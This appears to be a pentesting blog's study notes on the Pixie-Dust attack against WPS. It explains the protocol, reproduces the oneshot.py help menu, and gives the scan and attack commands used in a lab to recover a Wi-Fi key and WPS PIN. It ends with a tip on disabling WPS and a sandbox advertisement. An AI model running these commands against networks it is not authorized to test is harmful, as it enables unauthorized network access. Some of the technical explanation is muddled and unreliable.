We covered one of the most popular wireless vulnerabilities, that is, WPS feature. Most wireless attacks that target this feature focus on guessing the 8-digit WPS PIN by working on finding the two main pre-shared keys that contitute the WPS PIN and this is how Pixie-Dust attack works. We demonstrated how this works in a Linux lab environment dedicated for that purpose.
Web Hacking & Pentesting Study Notes
What is WPS?
The goal of Wi-Fi Protected Setup (WPS), formerly known as Wi-Fi Simple Config, is to establish a secure wireless network within your house.
The protocol, which was developed by Cisco and debuted in 2006, aims to make it simple for home users to set up Wi-Fi Protected Access and to add new devices to an existing network without having to enter complicated passphrases.
These users may be intimidated by the available security options or have little experience with wireless security. Devices from Brother, Canon, and HP all use it for their printers. WPS is a wireless protocol that allows you to join specific Wi-Fi devices, like security cameras and printers, to the Wi-Fi network without needing to provide a password. Additionally, some devices connect to the wireless network using a different method known as WPS Pin.
The owner of Wi-Fi credentials can prevent other users from connecting to their home network by utilizing Wi-Fi Protected Setup. Wi-Fi use is another option available to the owner. By pushing the WPS button on the home router, this can be adjusted.
What is Pixie-Dust Attack against WPS?
The way a Pixie-Dust attack operates is by bruteforcing the WPS protocol key. WPS was designed to make router access simpler, and it succeeded in that regard—for hackers.
Eight digits, or two Pre-Shared Keys, or PSKs, make up a WPS pin. The pin is half of each PSK. You must comprehend how the queries to the AP operate in order to comprehend how a Pixie Dust attack operates:
1. Computer sends - EAPOL Start
2. Router sends - EAP-Request for the Identity
3. Computer sends - Responds with the Identity
4. Router sends - EAP request
5. Computer sends - EAP response
Now, two more nonces—which are meant to be generated randomly—are required in order to successfully bruteforce the previously specified PSKs. The most crucial aspect is that we can bruteforce this key even on a sluggish system because the random numbers are actually derivatives of the hashes or are just zeroes! If the router’s implementation is flawed, which it usually is, it will still function, and you should be able to locate a list of susceptible routers online.
Wireless Attack Tools Against WPS
- Aircrack-ng
- Oneshot.py
- Pixiewps
Attacking WPS With Oneshot.py
OneShot performs Pixie Dust attack without having to switch to monitor mode.
We can invoke the help menu first
oneshot.py <arguments>
Required arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts [0]
-w, --write : Write AP credentials to the file on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Alway print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
Next we will want to scan the wireless network interface for wireless networks
iw dev wlan0 scan
The output of the above command will give us details about the available wireless networks. We choose the network with WPS enabled and start the attack
python3 oneshot.py -i wlan0 -b 02:00:30:00:01:30 -K
As explained in the video below, the above command if successful will yield in revealing the wireless network security key and the WPS PIN.
Preventing WPS Attacks
To prevent wireless attacks that target WPS feature, simply turn it off from the router admin panel or by pushing the WPS button back to its OFF state.
Wait, I haven’t finished 🙂 I have breaking news for you:
ANYRUN sandbox now offers #Windows10 x64 VM to free users.
You can detonate, analyze, and interact with malware in a modern OS.
Check out the video below for detailed explanation.